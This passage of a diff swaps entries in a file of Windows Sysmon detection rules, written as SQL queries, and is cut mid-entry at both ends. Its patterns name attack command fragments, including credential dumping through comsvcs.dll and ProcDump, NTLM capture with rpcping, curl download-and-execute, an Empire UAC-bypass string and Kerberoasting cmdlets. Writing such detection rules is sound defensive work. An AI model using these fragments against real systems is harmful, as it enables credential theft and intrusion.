(-s) and force the NTLM hash to be sent in the process.", + "author": "Julia Fomina, oscd.community", "tags": [ - "attack.collection", - "attack.t1123" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Legitimate audio capture by legitimate user." + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%WindowsAudioDevice-Powershell-Cmdlet%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rpcping.exe' ESCAPE '\\' AND (CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/s%' ESCAPE '\\')) AND ((CommandLine LIKE '%-u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%/u%' ESCAPE '\\' AND CommandLine LIKE '%NTLM%' ESCAPE '\\') OR (CommandLine LIKE '%-t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\') OR (CommandLine LIKE '%/t%' ESCAPE '\\' AND CommandLine LIKE '%ncacn\\_np%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_audio_capture.yml" + "filename": "proc_creation_win_rpcping_credential_capture.yml" }, { - "title": "Potential Product Reconnaissance Via Wmic.EXE", - "id": "15434e33-5027-4914-88d5-3d4145ec25a9", - "status": "experimental", - "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", - "author": "Nasreddine Bencherchali", + "title": "Hiding Files with Attrib.exe", + "id": "4281cb20-2994-4580-aa63-c8b86d019934", + "status": "test", + "description": "Detects usage of attrib.exe to hide files from users.", + "author": "Sami Ruohonen", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Unknown" + "IgfxCUIService.exe hiding *.cui files via .bat script (attrib.exe a child of cmd.exe and igfxCUIService.exe is the parent of the cmd.exe)", + "Msiexec.exe hiding desktop.ini" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +h %' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\desktop.ini %' ESCAPE '\\') OR (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '+R +H +S +A \\\\\\*.cui' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\WINDOWS\\\\system32\\\\\\*.bat' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_recon_product.yml" + "filename": "proc_creation_win_attrib_hiding_files.yml" }, { - "title": "Potential SquiblyTwo Technique Execution", - "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "status": "test", - "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", - "author": "Markus Neis, Florian Roth", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1047", - "attack.t1220", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "Potential Suspicious Activity Using SeCEdit", - "id": "c2c76b77-32be-4d1f-82c9-7e544bdfe0eb", - "status": "experimental", - "description": "Detects potential suspicious behaviour using secedit.exe. Such as exporting or modifying the security policy", - "author": "Janantha Marasinghe", + "title": "Dumping Process via Sqldumper.exe", + "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", + "status": "test", + "description": "Detects process dump via legitimate sqldumper.exe binary", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.defense_evasion", "attack.credential_access", - "attack.privilege_escalation", - "attack.t1562.002", - "attack.t1547.001", - "attack.t1505.005", - "attack.t1556.002", - "attack.t1562", - "attack.t1574.007", - "attack.t1564.002", - "attack.t1546.008", - "attack.t1546.007", - "attack.t1547.014", - "attack.t1547.010", - "attack.t1547.002", - "attack.t1557", - "attack.t1082" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administrative use" + "Legitimate MSSQL Server actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\secedit.exe' ESCAPE '\\' OR OriginalFileName = 'SeCEdit') AND ((CommandLine LIKE '%/export%' ESCAPE '\\' AND CommandLine LIKE '%/cfg%' ESCAPE '\\') OR (CommandLine LIKE '%/configure%' ESCAPE '\\' AND CommandLine LIKE '%/db%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_secedit_execution.yml" + "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" }, { - "title": "Potential Signing Bypass Via Windows Developer Features", - "id": "a383dec4-deec-4e6e-913b-ed9249670848", - "status": "experimental", - "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Run Once Task Execution as Configured in Registry", + "id": "198effb6-6c98-4d0c-9ea3-451fa143c45c", + "status": "test", + "description": "This rule detects the execution of Run Once task as configured in the registry", + "author": "Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Description = 'Run Once Wrapper') AND (CommandLine LIKE '%/AlternateShellStartup%' ESCAPE '\\' OR CommandLine LIKE '%/r' ESCAPE '\\'))" ], - "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" + "filename": "proc_creation_win_runonce_execution.yml" }, { - "title": "Suspicious Regsvr32 Execution With Image Extension", - "id": "089fc3d2-71e8-4763-a8a5-c97fbb0a403e", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "status": "experimental", - "description": "Detects the execution of REGSVR32.exe with DLL files masquerading as image files", + "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.010" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND (CommandLine LIKE '%.bmp' ESCAPE '\\' OR CommandLine LIKE '%.cr2' ESCAPE '\\' OR CommandLine LIKE '%.eps' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.ico' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.nef' ESCAPE '\\' OR CommandLine LIKE '%.orf' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.raw' ESCAPE '\\' OR CommandLine LIKE '%.sr2' ESCAPE '\\' OR CommandLine LIKE '%.tif' ESCAPE '\\' OR CommandLine LIKE '%.tiff' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_regsvr32_image.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "Use Short Name Path in Command Line", - "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "title": "Gpscript Execution", + "id": "1e59c230-6670-45bf-83b0-98903780607e", "status": "experimental", - "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", - "author": "frack113, Nasreddine Bencherchali", + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1218" ], "falsepositives": [ - "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." + "Legitimate uses of logon scripts distributed via group policy" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpscript.exe' ESCAPE '\\' OR OriginalFileName = 'GPSCRIPT.EXE') AND (CommandLine LIKE '% /logon%' ESCAPE '\\' OR CommandLine LIKE '% /startup%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" + "filename": "proc_creation_win_lolbin_gpscript.yml" }, { - "title": "Query Usage To Exfil Data", - "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", - "status": "experimental", - "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sdclt Child Processes", + "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "status": "test", + "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_query_session_exfil.yml" + "filename": "proc_creation_win_sdclt_child_process.yml" }, { - "title": "Curl Download And Execute Combination", - "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", - "status": "test", - "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", - "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", + "title": "Process Reconnaissance Via Wmic.EXE", + "id": "221b251a-357a-49a9-920a-271802777cc0", + "status": "experimental", + "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" + "filename": "proc_creation_win_wmic_recon_process.yml" }, { - "title": "Conti NTDS Exfiltration Command", - "id": "aa92fd02-09f2-48b0-8a93-864813fb8f41", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", "status": "test", - "description": "Detects a command used by conti to exfiltrate NTDS", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560" + "attack.defense_evasion", + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%7za.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\C$\\\\temp\\\\log.zip%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_conti_7zip.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Deleted Data Overwritten Via Cipher.EXE", - "id": "4b046706-5789-4673-b111-66f25fe99534", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", "status": "experimental", - "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", - "author": "frack113", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1485" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'CIPHER.EXE' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "PUA - CleanWipe Execution", - "id": "f44800ac-38ec-471f-936e-3fa7d9c53100", - "status": "experimental", - "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "status": "test", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administrative use (Should be investigated either way)" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SepRemovalToolNative\\_x64.exe' ESCAPE '\\' OR (Image LIKE '%\\\\CATClean.exe' ESCAPE '\\' AND CommandLine LIKE '%--uninstall%' ESCAPE '\\') OR (Image LIKE '%\\\\NetInstaller.exe' ESCAPE '\\' AND CommandLine LIKE '%-r%' ESCAPE '\\') OR (Image LIKE '%\\\\WFPUnins.exe' ESCAPE '\\' AND CommandLine LIKE '%/uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/enterprise%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_pua_cleanwipe.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "HackTool - Empire PowerShell UAC Bypass", - "id": "3268b746-88d8-4cd3-bffc-30077d02c787", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects some Empire PowerShell UAC bypass methods", - "author": "Ecco", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update)%' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update);%' ESCAPE '\\'))" + 